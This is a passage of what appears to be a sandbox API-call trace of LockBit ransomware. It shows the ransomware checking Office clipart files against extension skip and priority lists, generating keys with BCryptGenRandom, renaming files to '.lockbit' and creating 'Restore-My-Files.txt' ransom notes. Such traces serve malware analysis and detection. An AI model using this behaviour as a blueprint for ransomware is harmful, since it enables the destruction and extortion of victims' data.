lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0100.844] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.845] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0100.845] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0100.845] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0100.845] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0100.845] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00052_.GIF") returned 1 [0100.845] lstrcmpiW (lpString1="ntldr", lpString2="AG00052_.GIF") returned 1 [0100.845] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00052_.GIF") returned 1 [0100.845] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00052_.GIF") returned 1 [0100.845] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00052_.GIF") returned 1 [0100.845] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00052_.GIF") returned 1 [0100.845] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00052_.GIF") returned 1 [0100.845] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0100.845] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned=".GIF" [0100.845] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0100.845] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0100.845] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0100.845] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0100.845] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0100.845] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0100.845] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0100.845] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0100.846] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0100.846] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0100.846] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0100.846] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0100.846] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0100.846] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0100.846] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0100.846] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0100.846] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0100.846] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0100.846] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0100.846] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0100.846] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0100.846] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0100.846] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0100.846] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0100.846] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0100.846] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0100.846] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0100.846] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0100.846] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.lockbit") returned 72 [0100.847] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0100.847] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.847] malloc (_Size=0x40068) returned 0x3ef0008 [0100.847] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=7686) returned 1 [0100.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.850] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0100.851] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.854] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0100.854] ReadFile (in: hFile=0x1194, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0100.873] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.873] malloc (_Size=0xa6) returned 0x77d800 [0100.873] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0100.874] free (_Block=0x77d800) [0100.874] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0100.874] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0100.874] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.874] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b6b4200, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8b6b4200, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x2e73, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00057_.GIF", cAlternateFileName="")) returned 1 [0100.874] lstrcmpiW (lpString1=".", lpString2="AG00057_.GIF") returned -1 [0100.875] lstrcmpiW (lpString1="..", lpString2="AG00057_.GIF") returned -1 [0100.875] PathFindExtensionW (pszPath="AG00057_.GIF") returned=".GIF" [0100.875] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0100.875] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0100.875] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0100.875] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0100.875] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0100.875] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0100.875] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0100.875] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0100.875] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0100.875] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0100.875] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0100.875] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0100.875] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0100.875] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0100.875] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0100.875] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0100.875] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0100.875] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0100.876] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0100.876] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0100.876] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0100.876] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0100.876] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0100.877] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0100.877] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0100.877] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0100.877] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0100.877] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0100.877] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.877] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0100.877] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0100.877] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0100.877] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0100.877] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00057_.GIF") returned 1 [0100.877] lstrcmpiW (lpString1="ntldr", lpString2="AG00057_.GIF") returned 1 [0100.877] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00057_.GIF") returned 1 [0100.877] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00057_.GIF") returned 1 [0100.877] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00057_.GIF") returned 1 [0100.877] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00057_.GIF") returned 1 [0100.877] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00057_.GIF") returned 1 [0100.877] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0100.877] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned=".GIF" [0100.877] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0100.878] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0100.878] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0100.878] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0100.878] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0100.878] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0100.878] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0100.878] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0100.878] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0100.878] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0100.879] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0100.879] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0100.879] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0100.879] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0100.879] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0100.879] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0100.879] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.lockbit") returned 72 [0100.879] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x334 [0100.879] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.880] malloc (_Size=0x40068) returned 0x3d70048 [0100.882] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=11891) returned 1 [0100.882] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.885] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0100.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.888] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0100.888] ReadFile (in: hFile=0x334, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0100.898] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.898] malloc (_Size=0xa6) returned 0x77d800 [0100.898] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0100.899] free (_Block=0x77d800) [0100.899] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0100.899] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0100.899] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.899] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29618e00, ftCreationTime.dwHighDateTime=0x1bd50af, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x29618e00, ftLastWriteTime.dwHighDateTime=0x1bd50af, nFileSizeHigh=0x0, nFileSizeLow=0x205, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00090_.GIF", cAlternateFileName="")) returned 1 [0100.899] lstrcmpiW (lpString1=".", lpString2="AG00090_.GIF") returned -1 [0100.899] lstrcmpiW (lpString1="..", lpString2="AG00090_.GIF") returned -1 [0100.899] PathFindExtensionW (pszPath="AG00090_.GIF") returned=".GIF" [0100.899] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0100.899] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0100.900] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0100.900] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0100.900] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0100.900] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0100.900] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0100.900] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0100.900] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0100.900] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0100.900] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0100.900] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0100.900] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0100.900] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0100.900] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0100.900] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0100.900] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0100.900] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0100.900] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0100.900] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0100.900] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0100.901] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0100.901] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0100.901] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0100.901] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0100.901] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0100.902] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0100.902] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0100.902] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0100.902] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.902] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0100.902] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0100.902] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0100.902] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0100.902] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00090_.GIF") returned 1 [0100.902] lstrcmpiW (lpString1="ntldr", lpString2="AG00090_.GIF") returned 1 [0100.902] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00090_.GIF") returned 1 [0100.902] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00090_.GIF") returned 1 [0100.902] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00090_.GIF") returned 1 [0100.902] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00090_.GIF") returned 1 [0100.902] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00090_.GIF") returned 1 [0100.902] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0100.902] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned=".GIF" [0100.903] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0100.903] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0100.903] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0100.903] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0100.903] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0100.903] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0100.903] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0100.903] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0100.903] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0100.903] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0100.904] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0100.904] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0100.904] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0100.904] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0100.904] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0100.904] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0100.904] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.lockbit") returned 72 [0100.904] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0100.904] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.905] malloc (_Size=0x40068) returned 0x3db00b8 [0100.907] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=517) returned 1 [0100.908] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.910] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0100.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.913] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0100.913] ReadFile (in: hFile=0x3b4, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0100.914] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.914] malloc (_Size=0xa6) returned 0x77d800 [0100.914] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0100.915] free (_Block=0x77d800) [0100.915] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" 